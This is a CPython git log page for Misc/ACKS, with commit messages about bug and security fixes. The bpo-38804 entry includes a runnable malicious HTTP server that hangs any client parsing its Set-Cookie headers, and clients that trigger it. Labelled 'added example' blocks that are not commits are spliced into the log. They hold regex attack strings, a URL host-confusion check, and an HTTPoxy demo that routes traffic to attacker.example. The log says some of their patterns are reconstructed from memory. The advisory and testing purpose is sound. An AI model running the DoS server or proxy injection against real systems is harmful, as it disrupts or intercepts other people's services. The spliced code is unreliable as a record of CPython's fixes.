path: root/Misc/ACKS
Commit message | Author | Age | Files | Lines
* bpo-38804: Fix REDoS in http.cookiejar (GH-17157) (GH-17345) | Victor Stinner | 2019-11-24 | 1 | -0/+1
  The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS).

  LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time.

  The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to

      \d+-\w+-\d+(\s*\s*\s*)$

  Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as

      LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

  caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space.

  You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g.

      from http.server import BaseHTTPRequestHandler, HTTPServer

      def make_set_cookie_value(n_spaces):
          spaces = " " * n_spaces
          expiry = f"1-c-1{spaces}!"
          return f"b;Expires={expiry}"

      class Handler(BaseHTTPRequestHandler):
          def do_GET(self):
              self.log_request(204)
              self.send_response_only(204)  # Don't bother sending Server and Date
              n_spaces = (
                  int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                  if len(self.path) > 1
                  else 65506  # Max header line length 65536
              )
              value = make_set_cookie_value(n_spaces)
              for i in range(99):  # Not necessary, but we can have up to 100 header lines
                  self.send_header("Set-Cookie", value)
              self.end_headers()

      if __name__ == "__main__":
          HTTPServer(("", 44020), Handler).serve_forever()

  This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete.

  Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html :

      import http.cookiejar, urllib.request

      cj = http.cookiejar.CookieJar()
      opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
      r = opener.open("http://localhost:44020/")

  The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default):

      import requests

      requests.get("http://localhost:44020/")

  * Regression test for http.cookiejar REDoS
    If we regress, this test will take a very long time.

  * Improve performance of http.cookiejar.ISO_DATE_RE
    A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

  (cherry picked from commit 1b779bfb8593739b11cbb988ef82a883ec9d077e)
* bpo-36713: Rename duplicated method in test_unicode. (#13525) | Michele Angrisano | 2019-05-23 | 1 | -0/+1
  modified: Lib/ctypes/test/test_unicode.py
  modified: Misc/ACKS
  new file: Misc/NEWS.d/next/Library/2019-05-23-15-57-36.bpo-36713.sjPhnf.rst
* [2.7] bpo-34472: Add data descriptor signature to zipfile (GH-8871) (GH-9407) | Serhiy Storchaka | 2018-09-22 | 1 | -0/+1
  This makes streamed zips compatible with MacOS Archive Utility and other applications.
  (cherry picked from commit 4ba3b50bfe6d50cd82d208023ea23e203ab50589)
  Co-authored-by: Silas Sewell <silas@sewell.org>
* [2.7] closes bpo-34050: Fix link in SSL docs (GH-8173). (GH-8179) | Benjamin Peterson | 2018-07-07 | 1 | -0/+1
  (cherry picked from commit 9c5ba097485c8c643b670acd4026f4382bc92f4b)
  Co-authored-by: Marcin Niemira <marcin@niemira.net>
* bpo-29456: Fix bugs in unicodedata.normalize: u1176, u11a7 and u11c3 (GH-1958) (GH-7704) | Xiang Zhang | 2018-06-15 | 1 | -0/+1
  Hangul composition check boundaries are wrong for the second character ([0x1161, 0x1176) instead of [0x1161, 0x1176]) and third character ((0x11A7, 0x11C3) instead of [0x11A7, 0x11C3]).
  (cherry picked from commit d134809cd3764c6a634eab7bb8995e3e2eff14d5)
  Co-authored-by: Wonsup Yoon <pusnow@me.com>
* [2.7] bpo-33542: Ignore DUID in uuid.get_node on Windows. (GH-6922) (GH-7015) | Serhiy Storchaka | 2018-05-20 | 1 | -0/+1
  uuid._ipconfig_getnode did not validate the maximum length of the value, so long as the value had the same type of formatting as a MAC address. This let it select DUIDs as MAC addresses. It now requires an exact length match.
  (cherry picked from commit c66c342cb42ab8a88884527ddfe3a5086bc06316)
  Co-authored-by: CtrlZvi <viz+github@flippedperspective.com>
* [2.7] bpo-32861: robotparser fix incomplete __str__ methods. (GH-5711) (GH-6795) (GH-6817) | Serhiy Storchaka | 2018-05-14 | 1 | -0/+1
  The robotparser's __str__ representation now includes wildcard entries.
  (cherry picked from commit c3fa1f2b93fa4bf96a8aadc74ee196384cefa31e)
  Co-authored-by: Michael Lazar <lazar.michael22@gmail.com>
* bpo-33038: Fix gzip.GzipFile for file objects with a non-string name attribute. (GH-6095) | Bo Bayles | 2018-05-09 | 1 | -0/+1
* [2.7] bpo-33256: Replace angle brackets around python object repr to display it in html (GH-6442). (GH-6650) | Serhiy Storchaka | 2018-04-30 | 1 | -0/+1
  (cherry picked from commit 7d68bfa82654ba01d860b8a772ff63bf0bd183ee)
  Co-authored-by: sblondon <sblondon@users.noreply.github.com>
* [2.7] bpo-31920: Fixed handling directories as arguments in the ``pygettext`` script. (GH-6259) (GH-6436) | Serhiy Storchaka | 2018-04-10 | 1 | -0/+1
  Based on patch by Oleg Krasnikov.
  (cherry picked from commit c93938b5beea4c3f592119ebee6d4029558db8de)
* [2.7] bpo-32981: Fix catastrophic backtracking vulns (GH-5955) | Benjamin Peterson | 2018-03-04 | 1 | -0/+2
  * Prevent low-grade poplib REDOS (CVE-2018-1060)
    The regex to test a mail server's timestamp is susceptible to catastrophic backtracking on long evil responses from the server. Happily, the maximum length of malicious inputs is 2K thanks to a limit introduced in the fix for CVE-2013-1752. A 2KB evil response from the mail server would result in small slowdowns (milliseconds vs. microseconds) accumulated over many apop calls. This is a potential DOS vector via accumulated slowdowns. Replace it with a similar non-vulnerable regex. The new regex is RFC compliant. The old regex was non-compliant in edge cases.
  * Prevent difflib REDOS (CVE-2018-1061)
    The default regex for IS_LINE_JUNK is susceptible to catastrophic backtracking. This is a potential DOS vector. Replace it with an equivalent non-vulnerable regex. Also introduce unit and REDOS tests for difflib.
  Co-authored-by: Tim Peters <tim.peters@gmail.com>
  Co-authored-by: Christian Heimes <christian@python.org>
  (cherry picked from commit 0e6c8ee2358a2e23117501826c008842acb835ac)
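Added example, not code from CPython or from either commit: it puts the old and new patterns of both REDoS fixes in this log side by side, the bpo-32981 difflib/poplib pair from this entry and the bpo-38804 http.cookiejar date regex from the entry above, and shows the two checks a maintainer wants before shipping a rewritten regex: the rewrite must agree with the original on legitimate input, and it must reject the attack string in time linear in its length. Assumptions: the cookie-date pattern is the simplified `\d+-\w+-\d+` shape the bpo-38804 message gives, with the trailing optional groups sketched in, rather than the full LOOSE_HTTP_DATE_RE; the difflib `IS_LINE_JUNK` and poplib timestamp patterns are reconstructed from memory of the fix and are not quoted from this page; all sample inputs are constructed.

```python
import re
import time

# Constructed vulnerable/fixed pairs.  Each vulnerable pattern has adjacent
# quantified groups that can all consume the same run of characters, so a
# failing match is retried for every way of splitting that run between them.
# Cookie-date: simplified shape from the bpo-38804 message (assumption: not
# the real LOOSE_HTTP_DATE_RE).  difflib/poplib: reconstructed from memory of
# the bpo-32981 fix (assumption: check against the commits).
PATTERNS = {
    "cookiejar date (simplified)": (
        # three \s* that can all match the same spaces: cost grows ~ n**3
        re.compile(r"^(\d\d?)-(\w+)-(\d+)\s*([A-Za-z]+)?\s*(?:\(\w+\))?\s*$"),
        # fix: every \s* belongs to exactly one optional group
        re.compile(r"^(\d\d?)-(\w+)-(\d+)\s*(?:([A-Za-z]+)\s*)?(?:\(\w+\)\s*)?$"),
        lambda n: "1-c-1" + " " * n + "!",
    ),
    "difflib IS_LINE_JUNK": (
        # two \s* separated by an optional '#': cost grows ~ n**2
        re.compile(r"\s*#?\s*$"),
        re.compile(r"\s*(?:#\s*)?$"),
        lambda n: " " * n + "x",
    ),
    "poplib timestamp": (
        # '.*' then '<[^>]+>': every '<' is retried as the timestamp start
        re.compile(rb"\+OK.*(<[^>]+>)"),
        re.compile(rb"\+OK.[^<]*(<.*>)"),
        lambda n: b"+OK " + b"<" * n,
    ),
}

# Constructed legitimate inputs on which old and new patterns must agree.
SAMPLES = {
    "cookiejar date (simplified)": [
        "01-Jan-2020", "1-Jan-2020 GMT", "1-Jan-2020 GMT (UTC)",
        "1-Jan-2020   (UTC)", "1-Jan-2020 !",
    ],
    "difflib IS_LINE_JUNK": ["", "   ", "#", "  # ", "  #x", "code"],
    "poplib timestamp": [
        b"+OK POP3 server ready <1896.697170952@dbc.mtview.ca.us>",
        b"+OK <a@b>", b"+OK no timestamp here", b"-ERR",
    ],
}


def match_seconds(pattern, text):
    """Wall-clock cost of a single .match().  The attack inputs are built so the
    match fails only after the engine has tried every split of the long run."""
    t0 = time.perf_counter()
    pattern.match(text)
    return time.perf_counter() - t0


def same_behaviour(vuln, fixed, samples):
    """Regression check for a rewritten regex: identical match/no-match result
    and identical captured groups on every legitimate sample."""
    for s in samples:
        a, b = vuln.match(s), fixed.match(s)
        if (a is None) != (b is None):
            return False
        if a is not None and a.groups() != b.groups():
            return False
    return True


def all_pairs_equivalent():
    return all(same_behaviour(v, f, SAMPLES[name])
               for name, (v, f, _) in PATTERNS.items())


def fixed_is_linear(name, n=100_000, budget=5.0):
    """The hardened pattern must reject an n-character attack string well inside
    the budget; the vulnerable member would need minutes to hours at this size."""
    _, fixed, make = PATTERNS[name]
    text = make(n)
    return fixed.match(text) is None and match_seconds(fixed, text) < budget


def demo(sizes=(100, 200, 300)):
    """Show how each pair scales.  Keep n small: the cubic cookie-date pattern
    already needs on the order of a second at n=300."""
    for name, (vuln, fixed, make) in PATTERNS.items():
        for n in sizes:
            text = make(n)
            print(f"{name:28s} n={n:4d}  vulnerable={match_seconds(vuln, text):8.4f}s"
                  f"  fixed={match_seconds(fixed, text):.6f}s")


if __name__ == "__main__":
    assert all_pairs_equivalent()
    demo()
```

The equivalence check is deliberately run on captured groups, not just on match/no-match: the poplib rewrite changes which `<...>` wins when a response contains several, which the commit calls out as an edge-case difference, so a sample with two bracketed tokens would (correctly) fail it.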
* [2.7] bpo-30028: make test.support.temp_cwd() fork-safe (GH-1066) (GH-5825) | Anselm Kruis | 2018-02-23 | 1 | -0/+1
  Make test.support.temp_cwd() fork-safe. The context manager test.support.temp_cwd() no longer removes the temporary directory when executing in a process other than the parent it entered from. If a forked child exits the context manager it won't do the cleanup.
  (cherry picked from commit 33dddac00ba8d9b72cf21b8698504077eb3c23ad)
  Co-authored-by: Anselm Kruis <a.kruis@science-computing.de>
* [2.7] bpo-31848: Fix broken error handling in Aifc_read.initfp() when the SSND chunk is not found (GH-5240) (GH-5781) | Miss Islington (bot) | 2018-02-21 | 1 | -0/+1
  Initialize self._ssnd_chunk so that aifc.Error is raised as intended, not AttributeError.
  (cherry picked from commit 80d20b918bd8a882043c493a7f958333ecb41727)
  Co-authored-by: Zackery Spytz <zspytz@gmail.com>
* [2.7] bpo-30157: Fix csv.Sniffer.sniff() regex pattern. (GH-5601) (GH-5604) | Serhiy Storchaka | 2018-02-09 | 1 | -0/+1
  Co-authored-by: Jake Davis <jcdavis@awedge.net>
  (cherry picked from commit 2411292ba8155327125d8a1da8a4c9fa003d5909)
* [2.7] bpo-30057: Fix potential missed signal in signal.signal(). (GH-4258) (#4263) | Antoine Pitrou | 2017-11-03 | 1 | -0/+1
  Bug report and patch by Jeroen Demeyer.
  (cherry picked from commit f6f90ff079a22b79a58d47b6117cc8a8c7d366f3)
* [2.7] bpo-31334: Fix timeout in select.poll.poll() (GH-3277) (#4034) | Riccardo Coccioli | 2017-10-18 | 1 | -0/+1
  Always pass -1, or INFTIM where defined, to the poll() system call when a negative timeout is passed to the poll.poll([timeout]) method in the select module. Various OSes throw an error with arbitrary negative values.
  (cherry picked from commit 6cfa927ceb931ad968b5b03e4a2bffb64a8a0604)
* bpo-25684: ttk.OptionMenu radiobuttons weren't unique (GH-2276) (GH-2960) | Cheryl Sabella | 2017-09-10 | 1 | -0/+1
  ttk.OptionMenu radiobuttons weren't unique between instances of OptionMenu.
  (cherry picked from commit a568e5273382a5dca0c27274f7d8e34c41a87d4d)
* [2.7] bpo-31107: Fix copyreg mangled slot names calculation. (GH-2989). (#3004) | Shane Harvey | 2017-08-05 | 1 | -0/+1
  (cherry picked from commit c4c9866064f03646c686d7e08b00aeb203c35c19)
* [2.7] bpo-30964: Mention ensurepip in package installation docs (GH-2795) | Nicholas | 2017-07-21 | 1 | -0/+1
  Adds a new 'Pip not installed' section that covers running `ensurepip` manually, and also references the relevant section of the Python Packaging User Guide.
  (cherry picked from commit b3527bfefd7a0188d43a2d7515ac6addd97a8202)
* bpo-30500: urllib: Simplify splithost by calling into urlparse. (#1849) (#2294) | Victor Stinner | 2017-06-20 | 1 | -0/+1
  The current regex based splitting produces a wrong result. For example::

      http://abc#@def

  Web browsers parse that URL as ``http://abc/#@def``, that is, the host is ``abc``, the path is ``/``, and the fragment is ``#@def``.
  (cherry picked from commit 90e01e50ef8a9e6c91f30d965563c378a4ad26de)
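Added example, not the commit's code: a small parser-differential check that makes the host confusion in the message above concrete. Two parsers disagreeing about the host of one URL is the security-relevant point, because any allow-list or SSRF filter that validates with one parser while the request is built with the other is bypassed by exactly those URLs. Assumptions: `_NAIVE_HOST` is a reconstruction of the pre-fix regex shape (host/port ends at `/` or `?` but not at `#`), `naive_host` mirrors the splithost()/splituser() pipeline as this example understands it, IPv6 literals are out of scope, and the URL list is constructed; `urllib.parse.urlsplit` is the standard-library parser the fix delegates to.

```python
import re
from urllib.parse import urlsplit

# Assumed shape of the pre-fix host regex (illustration, not the commit's code):
# the host/port group stops at '/' or '?' but not at '#', which is what lets
# "abc#@def" through as a single host_port token.
_NAIVE_HOST = re.compile(r"^//([^/?]*)(.*)$")


def naive_host(url):
    """Host as a regex-based splithost()/splituser() pipeline would see it."""
    scheme, sep, rest = url.partition(":")
    if not sep:
        return None
    m = _NAIVE_HOST.match(rest)
    if m is None:
        return None
    host_port = m.group(1)
    # userinfo is cut at the last '@', as splituser() does; for "abc#@def"
    # that makes "abc#" look like a user name and "def" like the host
    host_port = host_port.rpartition("@")[2]
    # drop a trailing :port (IPv6 literals not handled in this illustration)
    return host_port.split(":")[0].lower() or None


def stdlib_host(url):
    """Host as urllib.parse.urlsplit() sees it, which is what browsers do."""
    return urlsplit(url).hostname


def parser_differential(urls):
    """URLs whose host differs between the two parsers.  Every entry is a
    candidate bypass for a check that validates the host with one parser
    while the connection is made by the other."""
    return [(u, naive_host(u), stdlib_host(u))
            for u in urls if naive_host(u) != stdlib_host(u)]


# Constructed inputs: the commit's example plus ordinary URLs that must agree.
URLS = [
    "http://abc#@def",
    "http://example.org/path",
    "http://user@example.org:8080/?q=1#frag",
]

if __name__ == "__main__":
    for url, naive, std in parser_differential(URLS):
        print(f"{url}: regex host={naive!r}, urlsplit host={std!r}")
```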
* [2.7] bpo-30657: Check & prevent integer overflow in PyString_DecodeEscape (#2174) | Jay Bosamiya | 2017-06-18 | 1 | -0/+1
* [2.7] bpo-29960 _random.Random corrupted on exception in setstate(). … (#1289) | Mariatta | 2017-05-27 | 1 | -0/+1
  (cherry picked from commit 9616a82e7802241a4b74cf7ae38d43c37bf66e48)
* bpo-30409: locale.getpreferredencoding doesn't return result (#1672) | Sean McCully | 2017-05-21 | 1 | -0/+1
* [2.7] bpo-27945: Fixed various segfaults with dict. (GH-1657) (#1681) | Serhiy Storchaka | 2017-05-20 | 1 | -0/+1
  Based on patches by Duane Griffin and Tim Mitchell.
  (cherry picked from commit 753bca3934a7618a4fa96e107ad1c5c18633a683)
* bpo-30357 each test in test_thread waits until all spawned threads finish (#1583) | grzgrzgrz3 | 2017-05-15 | 1 | -0/+1
  * bpo-30357 each test in test_thread waits until all spawn threads finish
  * bpo-30357 each test in test_thread waits until all spawn threads finish
  * bpo-30357: test_thread now uses threading_cleanup() (#1592)
    test_thread: setUp() now uses support.threading_setup() and support.threading_cleanup() to wait until threads complete to avoid random side effects on following tests.
    Co-Authored-By: Victor Stinner <victor.stinner@gmail.com>
  * bpo-30357: test_thread now uses threading_cleanup() (#1592)
    test_thread: setUp() now uses support.threading_setup() and support.threading_cleanup() to wait until threads complete to avoid random side effects on following tests.
    Co-Authored-By: Victor Stinner <victor.stinner@gmail.com>
* [2.7] bpo-29243: Fix Makefile with respect to --enable-optimizations (GH-1478) (#1522) | torsava | 2017-05-09 | 1 | -0/+1
  * bpo-29243: Fix Makefile with respect to --enable-optimizations
    When using the Profile Guided Optimization (./configure --enable-optimizations) Python is built not only during `make` but rebuilt again during `make test`, `make install` and others. This patch fixes the issue. Note that this fix produces no change at all in the Makefile if configure is run without --enable-optimizations.
  * !squash.
  (cherry picked from commit a1054c3b0037d4c2a5492e79fc193f36245366c7)
* bpo-29506: Clarify deep copy note in copy module | Nick Coghlan | 2017-04-09 | 1 | -0/+1
  The reference to administrative data was confusing to readers, so this simplifies the note to explain that deep copying may copy more than you intended, such as data that you expected to be shared between copies.
  Patch by Sanyam Khurana.
* [2.7] bpo-19225: Lack of c api exceptions doc (#964) | cocoatomo | 2017-04-08 | 1 | -0/+1
  * Keep the c-api exception doc up-to-date
  cherry-pick'ed from ec1f5df..e3d6db3 and fix conflict
* Issue #28768: Fix implicit declaration of function _setmode. Patch by Masayuki Yamamoto | Steve Dower | 2016-12-28 | 1 | -1/+2
* Issue #13051: Fixed recursion errors in large or resized curses.textpad.Textbox. | Serhiy Storchaka | 2016-12-28 | 1 | -0/+1
  Based on patch by Tycho Andersen.
* Issue #29078: Add the missing import in datetime.time doc example. | Xiang Zhang | 2016-12-27 | 1 | -0/+1
  Patch by Dhushyanth Ramasamy.
* Issue #10656: Fix out-of-tree building on AIX | Martin Panter | 2016-11-20 | 1 | -0/+2
  The ld_so_aix script and python.exp file are created in the build directory. Patch by Tristan Carel and Michael Haubenwallner.
* Issue #28000: Fix gethostbyname_r() usage on AIX with _LINUX_SOURCE_COMPAT | Martin Panter | 2016-11-14 | 1 | -0/+1
  Patch by Matthieu S.
* Issue #28616: Correct help for sys.version_info releaselevel component. | Ned Deily | 2016-11-04 | 1 | -0/+1
  Patch by Anish Tambe.
* Issue #28387: Fixed possible crash in _io.TextIOWrapper deallocator when the garbage collector is invoked in another thread. | Serhiy Storchaka | 2016-11-03 | 1 | -0/+1
  Based on patch by Sebastian Cufre.
* Issue #26240: Clean up the subprocess module doc string | Martin Panter | 2016-10-26 | 1 | -0/+1
  Patch by Tim Mitchell.
* Issue #28435: Avoid no_proxy environment variable interfering with tests | Martin Panter | 2016-10-22 | 1 | -0/+1
  Patch by Piotr Szczepaniak.
* Issue #18287: PyType_Ready() now checks that tp_name is not NULL. | Serhiy Storchaka | 2016-10-07 | 1 | -0/+1
  Original patch by Niklas Koep.
* Issue #28815: Change '?' to '<module>' in some doc examples. | Terry Jan Reedy | 2016-09-30 | 1 | -0/+1
  Patch by Mariatta Wijaya.
* IDLE NEWS item and ack. | Terry Jan Reedy | 2016-09-29 | 1 | -0/+1
* Issue #27806: add Aleks to Misc/ACKS. | Ned Deily | 2016-09-18 | 1 | -0/+1
* Issue #27934: Use float.__repr__ instead of plain repr when JSON-encoding an instance of a float subclass. Thanks Eddie James. | Mark Dickinson | 2016-09-03 | 1 | -0/+1
* #2466: ismount now recognizes mount points the user can't access. | R David Murray | 2016-08-23 | 1 | -0/+1
  Patch by Robin Roth, backport by Xiang Zhang.
* Prevent HTTPoxy attack (CVE-2016-1000110) | Senthil Kumaran | 2016-07-30 | 1 | -0/+1
  Ignore the HTTP_PROXY variable when REQUEST_METHOD environment is set, which indicates that the script is in CGI mode.
  Issue reported and patch contributed by Rémi Rampin.
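Added example, not CPython's getproxies_environment(): it reconstructs both halves of the attack the entry above describes, the CGI header-to-environment mapping that turns a client-supplied `Proxy:` request header into the `HTTP_PROXY` variable, and a proxy lookup that applies the mitigation the message states (drop the http proxy when `REQUEST_METHOD` is set). Assumptions: the `HTTP_` prefix, upper-casing and `-` to `_` translation follow the standard CGI convention; keeping an all-lower-case `http_proxy`, which no request header can produce, is this example's own choice and is marked as such in the code; the environments are constructed.

```python
def cgi_environ(method, headers, base=None):
    """Constructed model of how a CGI gateway exposes request headers to the
    script: REQUEST_METHOD is set and every header becomes HTTP_<NAME>
    (upper case, '-' replaced by '_').  A client 'Proxy:' header therefore
    lands in HTTP_PROXY, the variable proxy-aware libraries read."""
    env = dict(base or {})
    env["REQUEST_METHOD"] = method
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def proxies_from_environ(environ):
    """Collect <scheme>_proxy settings case-insensitively, then apply the
    CVE-2016-1000110 mitigation: when REQUEST_METHOD is present the process
    is a CGI script and HTTP_PROXY may have been injected by the client, so
    the http proxy is discarded."""
    proxies = {}
    for name, value in environ.items():
        if value and name.lower().endswith("_proxy"):
            proxies[name.lower()[:-6]] = value
    if "REQUEST_METHOD" in environ:
        # CGI mode: HTTP_PROXY is attacker-controlled, never trust it.
        proxies.pop("http", None)
        # An all-lower-case http_proxy cannot be produced from a header, so
        # an operator-set value is still honoured (this example's choice,
        # not something the commit message states).
        if environ.get("http_proxy"):
            proxies["http"] = environ["http_proxy"]
    return proxies


def attacker_controls_http_proxy(environ):
    """True if an outbound http:// request from this process would be routed
    through a proxy taken from the request headers."""
    injected = environ.get("HTTP_PROXY")
    return bool(injected) and proxies_from_environ(environ).get("http") == injected


if __name__ == "__main__":
    # Constructed request: the attacker adds a Proxy header to an ordinary GET.
    env = cgi_environ("GET", {"Host": "victim.example",
                              "Proxy": "http://attacker.example:8080"})
    print("HTTP_PROXY as seen by the CGI script:", env["HTTP_PROXY"])
    print("proxies after mitigation:", proxies_from_environ(env))
    print("attacker controls outbound proxy:", attacker_controls_http_proxy(env))
```

The unmitigated behaviour is the first loop on its own: any library that builds its proxy map that way and then performs an outbound http:// request from inside the CGI handler sends that request, with its body and credentials, to the address the client chose.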
* Issue #27490: Do not build pgen when cross-compiling | Martin Panter | 2016-07-28 | 1 | -0/+1
  The dependency on the $(PGEN) variable must only be set when not cross-compiling. When cross-compiling, $(PGEN) will not be used, so no need to build it.
  Patch by Thomas Perl.
* Issue #25393: Fix probable copy/paste error in resource docs | Zachary Ware | 2016-07-19 | 1 | -0/+1
  Patch by Alakshendra Yadav.
* Issue #27238: Got rid of bare excepts in the turtle module. | Serhiy Storchaka | 2016-06-14 | 1 | -0/+1
  Original patch by Jelle Zijlstra.
* #16484: Change PYTHONDOCS to "https:", and fix links to use lowercase | Martin Panter | 2016-06-12 | 1 | -0/+1
  Implementation by Sean Rodman; test by Kaushik Nadikuditi.
* Issue #25738: Don’t send message body for 205 Reset Content | Martin Panter | 2016-06-08 | 1 | -0/+1
  Patch by Susumu Koshiba.
* Issue 25926: Clarify that the pure python equivalents are only approximate. | Raymond Hettinger | 2016-05-28 | 1 | -0/+1